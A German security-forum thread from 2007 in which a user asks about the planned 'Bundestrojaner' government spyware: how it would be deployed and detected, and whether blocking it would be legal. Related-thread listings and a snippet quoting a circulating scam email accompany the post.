Onlinedurchsuchung NR - Bundestrojaner - Standard

Onlinedurchsuchung NR - Bundestrojaner



So liebe Leser und Poster dieses Themas;

Ich habe bezglich des Themas ein bzw. mehrere Fragen:

Wenn unser lieber Herr Wolfgang Schuble dieses Gesetz durchbringt und somit ein Programm entwickelt wird (bzw. schon wurde), wie gehen die Behrden damit um?

Vor allem: Inwiefern wird dieses Programm zur Online-Durchsuchung das System bzw. den Nutzer treffen? Gibt es eine Weise, mit der man nachschauen oder verfolgen kann wie dieses Programm in das betroffene System eingedrungen ist? Wird es automatisch mit geupdatet?

Nun wenn ich frage ob man sich davor schtzen kann ist diese Frage wohl nicht sehr schlau zu beantworten wie ich vermute...


Wie ist es mit einem Unix-Betriebsystem?

Fakt ist: Jeder der sich ein wenig mit solchen Themen beschftigt, wei das es kein Programm gibt gegen welches man sich nicht schtzen knnte.

Die frage und zugleich eine Antwort ist; Jegliche anonymisierungs und anti-spionage-tools sowie selbst erstellte Programmierte "Helfer" werden vermutlich per Gesetz strafrechtlich geahndet wenn der zugriff des von der Regierung generierten Programms, verhindert wird oder die Verbindung getrennt? Also nehme ich an, oder?

So demnach gibt es also in dieser Hinsicht keinen Schutz fr seine Privatsphre.

Zugleich erht das auch noch das Schadenspotenzial das auf dem System vorkommen kann durch solch eine Software, bzw. durch andere Trojaner???!


Eine Antwort zu diesen Fragen / Feststellungen wre wnschenswert.



LG, Terayaki

Gendert von terayaki (17.07.2007 um 23:44 Uhr)

Antwort

Themen zu Onlinedurchsuchung NR - Bundestrojaner
andere, anderen, anhang, anzeige, bundes, bundestrojaner, ellung, folge, folgende, illegale, inhalt, interne, internet, ip-adresse, klein, lschen, musikdateien, neuen, nicht ffnen, nutzung, protokoll, rechners, software, stelle, strafanzeige, stndige, system, umlauf, ffnen



hnliche Themen: Onlinedurchsuchung NR - Bundestrojaner


  1. Bundestrojaner auf 2.ten Pc
    Plagegeister aller Art und deren Bekmpfung - 26.06.2015 (18)
  2. Bundestrojaner ?
    Log-Analyse und Auswertung - 01.01.2015 (1)
  3. Bundestrojaner?
    Log-Analyse und Auswertung - 22.11.2013 (7)
  4. Bundestrojaner?
    Log-Analyse und Auswertung - 12.11.2013 (9)
  5. Bundestrojaner
    Plagegeister aller Art und deren Bekmpfung - 22.10.2013 (9)
  6. GVU Bundestrojaner
    Plagegeister aller Art und deren Bekmpfung - 18.12.2012 (5)
  7. GVU - Bundestrojaner
    Plagegeister aller Art und deren Bekmpfung - 02.12.2012 (15)
  8. Bundestrojaner
    Log-Analyse und Auswertung - 23.11.2012 (2)
  9. Bundestrojaner will 100
    Log-Analyse und Auswertung - 21.11.2012 (34)
  10. Bundestrojaner 1.13
    Log-Analyse und Auswertung - 18.11.2012 (50)
  11. Bundestrojaner
    Plagegeister aller Art und deren Bekmpfung - 10.11.2012 (13)
  12. Bundestrojaner 1.13
    Plagegeister aller Art und deren Bekmpfung - 08.10.2012 (1)
  13. Bundestrojaner =(
    Log-Analyse und Auswertung - 23.09.2012 (8)
  14. 100 Bundestrojaner
    Log-Analyse und Auswertung - 19.03.2012 (16)
  15. Bundestrojaner
    Log-Analyse und Auswertung - 09.03.2012 (15)
  16. Bundestrojaner
    Plagegeister aller Art und deren Bekmpfung - 07.03.2012 (11)
  17. Bundestrojaner
    Log-Analyse und Auswertung - 14.02.2012 (22)

Zum Thema Onlinedurchsuchung NR - Bundestrojaner - Hallo, neue Bundestrojaner-Mails im Umlauf: Zitat: Sehr geehrter Internetnutzer, im Rahmen unserer stndigen automatisierten berprfung von sogenannten Tauschbrsen im Internet, wurde folgende IP-Adresse auf unserem System ermittelt. IP: 81.149.105.158 Der - Onlinedurchsuchung NR - Bundestrojaner...
Archiv
Du betrachtest: Onlinedurchsuchung NR - Bundestrojaner auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.